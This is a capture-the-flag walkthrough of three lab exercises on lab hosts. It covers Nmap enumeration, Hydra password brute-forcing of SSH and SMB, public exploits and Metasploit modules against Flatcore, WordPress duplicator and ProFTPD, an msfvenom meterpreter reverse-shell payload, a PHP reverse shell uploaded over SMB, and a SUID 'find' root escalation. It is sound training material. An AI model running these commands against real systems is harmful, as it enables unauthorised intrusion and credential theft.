---

CTF 1

Question 1

Identify and exploit the vulnerable web application running on target1.ine.local and retrieve the flag from the root directory. The credentials admin:password1 may be useful.

Firstly, let's run an Nmap scan. We can see that there is a server open on port 80. We can open this up in our browser to see that its running a CMS service. There is a login button on the right even though its in a different language. We can use the credentials provided to us to login.

Since we know that the website is running on Flatcore 2.0.7, let's utilize SearchSploit to find if there are any exploits for this specific version. We can see that there is an exploit available but it's not within the Metasploit framework so we'll have to exploit it manually. To download the exploit:

searchsploit -m 50262

Now, let's open up the file to view the code before executing it, to see what it does and how to use it. After reviewing the code, we can see the syntax to use as the author has kindly provided an example on how to run the exploit:

python3 50262.py 'http://target1.ine.local' 'admin' 'password1'

We have successfully logged in! To now find the flag we need to list out the files using ls / which we can then cat out to read the contents.

Question 2

Further, identify and compromise an insecure system user on target1.ine.local.

To further compromise the system, we have been given a hint that there is an insecure user. We can run the command ls -l /home as the user directories are typically located in the home directory. We can see that there is another user called iamaweakuser.

From our Nmap scan earlier, we know that there is SSH enabled, so let's attempt to connect via SSH using this user to the target - but before we do that, we need find out the password. We can use Hydra to brute-force the password using the wordlist unix_passwords.txt.

hydra -l iamaweakuser -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://target1.ine.local

Now that we have obtained credentials, let's login via SSH:

ssh iamaweakuser@target1.ine.local

Now just list out the contents and read the flag!

Question 3

Identify and exploit the vulnerable plugin used by the web application running on target2.ine.local and retrieve the flag3.txt file from the root directory.

Again, let's start by running an Nmap scan on the target. We can see that port 80 is open again as well as SSH. Let's open up the web browser to view what the website looks like - and we can that it's running WordPress. Now the plugin directory on WordPress is normally located under /wp-content/plugins so let's navigate to that. In this case, we don't get any output.

Let's utilize gobuster to brute-force the directory to find out what plugins are being used:

gobuster dir -u http://target2.ine.local/wp-content/plugins -w /usr/share/nmap/nselib/data/wp-plugins.lst

We can see that it enumerates two plugins, akismet and duplicator. Let's use SearchSploit again to find if there any exploits for both of these plugins. In this case, akismet doesn't have any exploits while there is a Metasploit module for duplicator.

Let's open up Metasploit and use the module called wp_duplicator_file_read. Now, set the options up and run the exploit - and it works. We can see that it displays the users that can log onto the system as the default file path specified is the /etc/passwd file. To find the flag, let's change the file path to /flag3.txt.

Question 4

Further, identify and compromise a system user requiring no authentication on target2.ine.local.

Since we identified the users already, let's go back. At the bottom of the list, there's a user called iamacrazyfreeuser. Since we discovered that SSH was open, let's connect using this user as we did for Question 2.

We have gained access without a password (if it did require a password - we could have performed a brute-force with Hydra as we did previously). Now just list out the contents and cat out the contents to get the last flag.

---

CTF 2

Question 1

Looks like smb user tom has not changed his password from a very long time

Firstly, let's run an Nmap service version detection and script scan specifically targeting port 445 as we know SMB runs on that port. Since we know that tom has a weak password, we can perform a brute-force attack using Hydra.

hydra -l tom -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target.ine.local smb

Alternatively, we can use the Metasploit module (smb_login) to perform the brute-force which will also give us an SMB session. Now, let's list out the shares - which again you can use the session within Metasploit or smbmap. I'm going to use smbmap in this case to list out the shares:

smbmap -H target.ine.local -u tom -p felipe

Now that we can see that there are only 3 shares that we can access, let's connect to those shares. In this case, I'm going to switch to my Metasploit session and do so but you can also use smbclient to connect. After connecting to the shares, list out the contents to find the flag.

Question 2

Using the NTLM hash list discovered in the previous challenge, can you compromise the user nancy?

From the previous task, we logged into the share HRDocuments to find the flag in which there was also a file called leakedhashes.txt. Download that file to then use as the PASS_FILE password list within the Metasploit module smb_login. Also set the SMBUser to nancy and run the brute-force. Now since we have a session, we can view the shares and try to access each one until we are allowed access. Lastly, list out the contents to find the flag.

Question 3

I wonder what the hint found in the previous challenge will be useful for!

From the previous question, make sure to also cat out the contents or download the hints.txt file. Since we have been given credentials for something, let's look at the other open services on the system by running another Nmap scan. We can see the port 21 is open with FTP running so let's try to connect to it using those credentials. Once connected, list out the contents to find the last flag.

Question 4

Can you compromise the target machine and retrieve the C://flag4.txt file?

From our Nmap scan, we can see that port 80 is also open running Microsoft IIS. Since we have access to FTP, let's upload a malicious asp or aspx payload to the server to gain a shell. We can utilize msfvenom to create a payload or we can use one of the pre-configured web shells located locally on the Kali Linux system. In this case, I will be using msfvenom as we can create a meterpreter payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f aspx > shell.aspx

We can now upload the aspx payload to the server via FTP using the put command. Now we need to set up our multi handler within Metasploit. Once that is done, head to the aspx file within the browser (http://target.ine.local/shell.aspx). Now that we have our meterpreter session, navigate to the root of the C:// drive and list out the contents to find the last flag.

---

CTF 3

Question 1

A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory.

Firstly, let's run a basic Nmap scan to find out what's running on the target. We can see that the version 1.3.5 of FTP is running so let's search for an exploit using SearchSploit. We can see that there is a Metasploit module (proftpd_modcopy) which we can use to exploit the service.

Let's load up Metasploit and run the exploit. Note that you will need to change the SITEPATH option as on within the documentation of the web page being hosted on port 80, it says that the root web Apache HTTP server is installed at /var/www/html.

We can then upgrade our session to a meterpreter session and open up a shell. Navigate to the root directory to get the flag.

Question 2

Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.

The question mentions that a local network on the target is vulnerable. Note that you need to run this command within the meterpreter session. To view the local services running on the target, we can use the command:

netstat -tuln 127.0.0.1

We can see that port 8888 is open so we can interact with it using Netcat but note that you will need to open a shell and run /bin/bash -i:

nc 127.0.0.1 8888

Since it asks for a password, let's use the phrase letmein as that was the hint from the previous flag and we have the second flag.

Question 3

A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?

Again, run an Nmap scan to see what services are running on the target. We can see that SMB or SAMBA in this case, is running. We can enumerate shares and other useful information using enum4linux.

In this case, we can see that the share site-uploads is accessible without credentials so let's navigate to that in our web browser. Since we have access to it and can upload files using smbclient, let's copy a PHP reverse shell to our current directory. We can do this by running:

cp /usr/share/webshells/php/php-reverse-shell.php

We can then upload it to the server by connecting to it using:

smbclient //target2.ine.local/site-uploads

# To upload the file:
put php-reverse-shell.php

Please note that when using this PHP reverse shell, you do have to edit some information for it to work. You can use a text editor of your choice (either vim or nano). Replace the IP field with your IP address as this is the IP address the shell will connect back to. Then we need to set up a listener using Netcat (nc -nvlp 1234) to listen for when the shell is executed to obtain a reverse connection.

Now open up the directory in the web browser again and click on the php-reverse-shell.php file. Then, head over to your Netcat listener and we have obtained access. Again, navigate to the root directory to cat out the flag.

Question 4

Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?

For this question, I really got stuck - so big thanks to @Prinu_17 for her writeup.

Firstly, we need to check what shells are available on the system and what permissions each shell has which we can do using the following command:

cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done

The command read each shell listed in /etc/shells and checks the permissions of each one using ls -l. It suppresses or removes errors with 2>/dev/null.

Essentially, we can use one of these shells to escalate our privileges. However, only a shell with all the permissions will be useful. We also need to check for executables with SetUID bit set that can run with root privileges. The SetUID bit set allows users to execute files with the permissions of the file owner's (e.g. root) which will allow us to escalate our privileges.

To check for executables with the SetUID bit set that can run with root privileges, we can run the command:

find / -perm -4000 2>/dev/null

This will essentially start searching in the root directory, look for files with the SetUID bit set (-perm -4000). It also suppresses error messages by redirecting them to /dev/null.

We can combine the find command with an executable to spawn a new shell with root privileges.

find / -exec /bin/rbash -p \; -quit

Now that we have escalated our privileges we can cat out the last flag using cat /root/flag4.txt.

---

That’s it for this section. Next one up is the post-exploitation section.

— Hmad